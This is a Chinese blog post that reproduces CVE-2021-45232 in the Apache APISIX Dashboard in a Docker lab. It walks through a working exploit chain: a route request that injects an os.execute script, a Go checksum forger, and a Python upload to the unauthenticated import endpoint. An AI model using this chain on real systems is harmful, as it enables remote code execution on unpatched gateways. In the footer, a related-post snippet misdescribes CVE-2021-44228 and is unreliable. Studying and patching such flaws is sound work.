CVE-2021-45232 Apache-apisix-dashboard 未授权到RCE

已于 2022-01-20 17:38:21 修改
阅读量5k 收藏 2
点赞数
分类专栏: web安全 文章标签: apache dashboard docker
于 2022-01-20 17:29:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/122434934
版权

目录

Apache APISIX介绍

Apache APISIX是一个动态、实时、高性能的API网关。提供了丰富的流量管理功能,如负载均衡、动态上游、canary释放、断路、认证、可观察性等。也可以使用Apache APISIX来处理传统的南北向流量,以及服务之间的东西向流量。它也可以用作k8s的ingress控制器。

漏洞概述

该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的接口,从而绕过身份验证。CVE编号为:CVE-2021-45232

未授权访问API:

/apisix/admin/migrate/export
/apisix/admin/migrate/import

影响版本

Apache APISIX Dashboard < 2.10.1

环境搭建

git clone https://github.com/apache/apisix-docker
cd apisix-docker/example/

修改docker-compose.yml:

apache/apisix-dashboard:2.7
apache/apisix:2.6-alpine

很多文章只是修改了第一处,如果只修改第一处的话,则会因为对应的版本号对不上,而导致登录报错。
在这里插入图片描述

在这里插入图片描述

接着通过docker-compose搭建即可

漏洞复现

漏洞环境搭建成功后,通过默认端口9000访问Web界面

在这里插入图片描述

后台RCE

其实如果没有未授权访问的话,也是可以先通过弱密码登录后台进行RCE的,接下来演示如何进入后台进行RCE。

在这里插入图片描述

首先创建一个上游服务

在这里插入图片描述

点击创建,名称可以随意命名,然后目标节点填的是我们转发请求的服务,这里我们填docker附带的Grafana应用,端口号为3000

点击下一步,提交即可。

接着再创建一个路由

在这里插入图片描述

名称随便起,然后路径也是可以自定义,点击下一步

选择我们刚才创建的上游服务

在这里插入图片描述

接下来,默认提交即可。

在这里插入图片描述

创建的路由配置如下:
在这里插入图片描述

创建路由成功后,回到路由配置界面,点击配置按钮,直接点击下一步,到按下提交按钮时使用Burp抓包

在这里插入图片描述

然后添加一个script字段,如下:

PUT /apisix/admin/routes/389826569650045636 HTTP/1.1
Host: 172.21.1.158:9000
Content-Length: 197
Accept: application/json
Origin: http://172.21.1.158:9000
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDE4ODcyNzQsImlhdCI6MTY0MTg4MzY3NCwic3ViIjoiYWRtaW4ifQ.m63RB9tu28GHzwT0D_jGbAAmzLQ7FgMIvjr6ze-EtE0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: http://172.21.1.158:9000/routes/389826569650045636/edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"uris":["/RCE123"],"methods":["GET","POST","PUT","DELETE","PATCH","HEAD","OPTIONS","CONNECT","TRACE"],"priority":0,"name":"A1LB1ue_route","status":1,"labels":{},"script": "os.execute('touch /tmp/Keepb1ue')","upstream_id":"389826160386638532"}

这里解释一下,这里URL后面routes/后的数字是来自创建的路由ID,而下面的upstream_id是来自创建的上游服务ID,需要自行对应。

在这里插入图片描述

Run之后,在看下配置:

在这里插入图片描述

接着我们访问一下:

http://172.21.1.158:9080/RCE123

访问后,再到docker中去查看是否创建了Keepb1ue这个文件进行验证

在这里插入图片描述

未授权接口RCE

那如果没有默认密码或者弱密码的话,这时我们就利用未授权接口进行RCE了

/apisix/admin/migrate/export
/apisix/admin/migrate/import

这里我们需要知道这两个接口一个是用来导出配置文件,一个是用来导入配置文件的。

我们可以使用/apisix/admin/migrate/export直接导出配置文件

我们可以尝试访问下,当然我们利用的是未授权接口,自然是不用登录

在这里插入图片描述

访问可以看到配置文件信息,这里仔细看,后面多出四个字节,这4个字节其实是配置文件的checksum值

在导入配置文件时,会对配置文件的checksum值进行校验,那这里其实是可以通过写脚本算出checksum校验值,或者是根据apisix的源码去计算出新的checksum值

源码位置在:apisix-dashboard-master\api\internal\handler\migrate\migrate.go的ExportConfig函数

将其计算源码单独抽取出来

package main

import (
    "encoding/binary"
    "fmt"
    "hash/crc32"
    "io/ioutil"
    "os"
)
func main() {
    gen()
}
func gen() {
    data := []byte(`{"Counsumers":[],"Routes":[{"id":"389828862525047492","create_time":1641885708,"update_time":1641885708,"uris":["/RCE123"],"name":"Keepb1ue_route","methods":["GET","POST","PUT","DELETE","PATCH","HEAD","OPTIONS","CONNECT","TRACE"],"script":"os.execute('touch /tmp/A1LB1ue')","script_id":"389792240563651268","upstream_id":"389828818199642820","status":1}],"Services":[],"SSLs":[],"Upstreams":[{"id":"389828818199642820","create_time":1641885682,"update_time":1641885682,"nodes":[{"host":"172.21.1.158","port":3000,"weight":1}],"timeout":{"connect":6,"read":6,"send":6},"type":"roundrobin","scheme":"http","pass_host":"pass","name":"upstream"}],"Scripts":[{"id":"389792240563651268","script":"os.execute('touch /tmp/A1LB1ue')"}],"GlobalPlugins":[],"PluginConfigs":[]}`)
    checksumUint32 := crc32.ChecksumIEEE(data)
    checksumLength := 4
    checksum := make([]byte, checksumLength)
    binary.BigEndian.PutUint32(checksum, checksumUint32)
    fileBytes := append(data, checksum...)

    content := fileBytes
    fmt.Println(content)

    importData := content[:len(content)-4]
    checksum2 := binary.BigEndian.Uint32(content[len(content)-4:])
    if checksum2 != crc32.ChecksumIEEE(importData) {
        fmt.Println(checksum2)
        fmt.Println(crc32.ChecksumIEEE(importData))
        fmt.Println("Check sum check fail, maybe file broken")
        return
    }
    err := ioutil.WriteFile("apisixPayload", content, os.ModePerm)
    if err != nil {
        fmt.Println("error!!")
        return
    }
}

将需要导入的配置进行替换,并插入RCE语句

接着运行这段脚本,会生成apisixPayload这个文件

在这里插入图片描述

这个就是我们要import上去的计算好校验值的新的配置文件,接下来使用python代码可以简单的传到服务端

import requests
url = "http://172.21.1.158:9000/apisix/admin/migrate/import"
files = {"file": open("apisixPayload", "rb")}
r = requests.post(url, data={"mode": "overwrite"}, files=files)
print(r.status_code)
print(r.content)

在这里插入图片描述

很好,没有报校验值错误。

接下来访问路由地址即可命令执行成功。

http://172.21.1.158:9080/RCE123

在这里插入图片描述

修复方案

更新到最新版本,新版本代理做了鉴权处理

keepb1ue
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【复现与代码分析】Apache APISIX Dashboard API权限绕过导致RCECVE-2021-45232)
weixin_45694388的博客
04-24 1219
API接口授权访问一直以来都是令甲方安全人员头疼的问题,在《OWASP API Security Top 10 2019》里面,Broken Object Level Authorization(失效的对象级授权),包括授权、越权访问等,就是排在第一位的安全问题:授权漏洞的出现频率越来越高,且漏洞的利用又相对简单,今后应针对这个方向的漏洞多做积累,多做总结。
Apache APISIX Dashboard 身份验证绕过漏洞 (CVE-2021-45232)
Adminxe的博客
12-29 3078
0x00 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 CVE-2021-45232 该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的..
网络安全最全Apache Apisix网关系统历史漏洞复现分析_apache apisix 漏洞(2),2024年最新网络安全 400道面试题通关宝典助你进大厂
最新发布
2401_84239830的博客
05-14 734
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 授权访问(附批量扫描POC)
热门推荐
weixin_43526443的博客
12-29 7万+
目录 Part1 漏洞描述 Part2 风险等级 Part3 漏洞影响 Part4 漏洞分析 4.1 漏洞源码 4.2 漏洞验证 4.3 POC Part5 修复建议 Part1 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关,Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架gin和drople
Apache APISIX Dashboard 授权访问(CVE-2021-45232 )
m0_54125423的博客
03-01 5043
一、漏洞原理 Apache APISIX是一个实时、动态、高性能的API网关。Apache APISIX Dashboard旨在让用户尽可能容易地通过前端界面来操作Apache APISIX。 2021年12月27日,Apache官方发布安全通告,Apache APISIX Dashboard中存在一个授权访问漏洞(CVE-2021-45232)。 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架,在框架 "gin "的基础上引入了框架 "d
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-22192:CVE-2021-22192靶场:授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
CVE-2021-45232 Apache APISIX Dashboard RCE漏洞复现
m0_58596609的博客
01-17 2638
CVE-2021-45232 Apache APISIX Dashboard RCE漏洞复现
Apache APISIX Dashboard 身份验证绕过漏洞(CVE-2021-45232)
kukudeshuo的博客
12-30 2765
Apache APISIX Dashboard 身份验证绕过漏洞(CVE-2021-45232) 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 CVE编号 CVE-2021-45232 FOFA语句 title="Apache APISIX Dashboard" 影响范围 Apache
CVE-2021-45232 Apache-apisix-dashboard RCE复现
weixin_46137328的博客
01-10 1692
0x00 概述Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache AP...
Apache APISIX Dashboard 授权访问漏洞(CVE-2021-45232)
Bird&Bird
03-13 644
Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的接口,从而绕
Apache APISIX Dashboard 授权访问漏洞公告(CVE-2021-45232)
ApacheAPISIX的博客
12-29 2528
在 Apache APISIX Dashboard 2.7-2.10 版本中出现了授权访问的安全漏洞,现将处理信息进行相关公告。
cve-2021-45232、Apache APISIX Dashboard身份认证绕过自检方法
weixin_48421613的博客
12-29 3542
漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的
CVE-2021-45232漏洞复现
派大星的博客
01-04 7190
cve-2021-45232漏洞复现
CVE-2021-45105/CVE-2021-44228
07-29
CVE-2021-45105和CVE-2021-44228是两个与Apache HTTP Server(Apache Web服务器)相关的漏洞编号。这些漏洞可能会影响Apache HTTP Server的安全性。CVE-2021-45105是一个路径遍历漏洞,攻击者可以利用它来读取服务器上受限制的文件。CVE-2021-44228是一个HTTP请求解析漏洞,攻击者可以通过发送恶意的请求导致服务器崩溃或远程代码执行。 为了保护系统安全,建议及时升级Apache HTTP Server到最新版本,并遵循相关安全建议和最佳实践。如果你是系统管理员或开发人员,可以查看Apache官方发布的安全公告,获取更详细的信息和修复方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值